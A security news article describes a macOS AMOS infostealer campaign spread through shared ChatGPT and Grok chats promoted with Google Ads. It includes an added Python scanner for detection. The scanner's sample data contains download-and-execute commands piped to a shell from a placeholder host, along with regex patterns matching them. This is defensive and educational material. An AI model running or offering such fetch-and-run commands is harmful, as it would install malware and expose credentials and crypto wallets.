Threat Actors Leverage ChatGPT, Grok, and Google Ads to Deploy macOS AMOS Stealer



Threat actors are evolving — and they’re doing it on trusted platforms.

A recent campaign shows attackers abusing shareable ChatGPT and Grok conversations, then promoting those links through Google Search ads. The goal? Convince macOS users to run Terminal commands that quietly install the Atomic macOS Stealer (AMOS).

This isn’t traditional malware distribution. It’s credibility-based delivery.

The Shift: Malware Hidden Behind Trust

Instead of hosting malware on suspicious domains, attackers are:

  • Publishing malicious “how-to” conversations on legitimate AI platforms
  • Boosting those pages using Google Ads
  • Framing the instructions as helpful troubleshooting steps

For example, a user searching for something harmless like “clear disk space on macOS” may encounter a sponsored AI chat result. The page looks legitimate. The domain is trusted. The instructions appear technical and helpful.

But the recommended Terminal command downloads and executes malicious code.

No fake installer.
No cracked software.
Just copy, paste, and compromise.

The malicious instructions are hosted on legitimate AI domains via public sharing links. That removes the psychological red flag users often rely on.

Paid ads further amplify visibility, placing these AI-hosted pages at the top of search results — sometimes ahead of legitimate support content.

This is social engineering layered with platform trust.

The Target: Cryptocurrency and Browser Data

macOS infostealers like AMOS are part of a growing underground economy. Their primary targets include:

  • Saved browser credentials
  • Apple Keychain secrets
  • Cryptocurrency wallets and seed phrases
  • Chrome crypto extensions (over 100 reported targets)
  • Wallet-themed phishing tied to brands like Ledger, Trezor, and Exodus

Some operators even advertise affiliate-style revenue sharing for crypto theft, highlighting how organized this ecosystem has become.

What defenders should watch for

  • Users copying Terminal commands from web pages
  • Scripts that download and execute immediately
  • Signed apps requesting unexpected permissions
  • Unusual outbound traffic to crypto-related infrastructure
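The first two items above, users pasting Terminal commands from web pages and scripts that download and execute in one step, are the part of this campaign a defender can actually look for in telemetry. The scanner below is an added example written for this article, not code from the article or from any vendor; it reviews shell-history or EDR process-exec records for the download-and-execute shapes described here and pulls out the contacted host so it can be checked against outbound-traffic logs. The `user|pid|command` record format and every event, host and URL in the sample are constructed for the example.

```python
"""Flag macOS shell commands that download and execute content in one step.

Added example: a review aid for shell history / process-exec telemetry.
The input format ("user|pid|command") and all sample values are assumptions
made up for this example; adapt parse_event() to your own source.
"""
import re
from typing import Iterable

# Constructed sample telemetry (not real events; example.invalid is a reserved TLD).
SAMPLE_EVENTS = [
    "alice|4021|ls -la ~/Library/Caches",
    "alice|4022|du -sh ~/Library/Caches/*",
    "alice|4023|curl -fsSL https://example.invalid/cleanup.sh | sh",
    "bob|5100|/bin/bash -c \"$(curl -s https://example.invalid/fix)\"",
    "bob|5101|curl -o /tmp/h https://example.invalid/h && chmod +x /tmp/h && /tmp/h",
    "carol|6010|brew update && brew cleanup",
    "carol|6011|curl -O https://example.invalid/notes.txt",
]

# Each rule describes one "download and execute immediately" shape.
RULES = [
    # fetched content piped straight into a shell
    ("pipe_download_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # fetched content executed via command substitution, e.g. bash -c "$(curl ...)"
    ("command_substitution_download",
     re.compile(r"\$\(\s*(curl|wget)\b")),
    # fetched to disk, marked executable and run on the same command line
    ("download_then_execute",
     re.compile(r"\b(curl|wget)\b.*&&.*chmod\s+\+x")),
]

URL_HOST = re.compile(r"https?://([^/\s\"')]+)")


def parse_event(line: str):
    """Split a 'user|pid|command' record; the command may itself contain '|'."""
    user, pid, command = line.split("|", 2)
    return user, int(pid), command


def scan_events(lines: Iterable[str]):
    """Return one finding per event that matches any rule.

    A download on its own (rule-free) is not flagged: the signal is the
    immediate execution, not the use of curl.
    """
    findings = []
    for line in lines:
        user, pid, command = parse_event(line)
        for name, pattern in RULES:
            if pattern.search(command):
                hosts = URL_HOST.findall(command)
                findings.append({
                    "user": user,
                    "pid": pid,
                    "rule": name,
                    "host": hosts[0] if hosts else None,  # for egress-log correlation
                    "command": command,
                })
                break  # one finding per event is enough for triage
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['user']} pid={f['pid']} rule={f['rule']} host={f['host']}")
        print(f"    {f['command']}")
```

Plain downloads such as `curl -O .../notes.txt` are deliberately not flagged; what this campaign relies on is the execution happening in the same pasted line, so that is what the rules key on. The `host` field is there so each hit can be joined against DNS or proxy logs for the "unusual outbound traffic" item.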

The bigger pattern is clear.

Modern macOS attacks don’t rely on obvious red flags anymore.

They rely on trusted platforms, legitimate domains, paid visibility, and signed applications to remove the moment where a user might hesitate.

That’s the shift defenders need to understand.

About the Author:

FirstHackersNews - Identifies Security
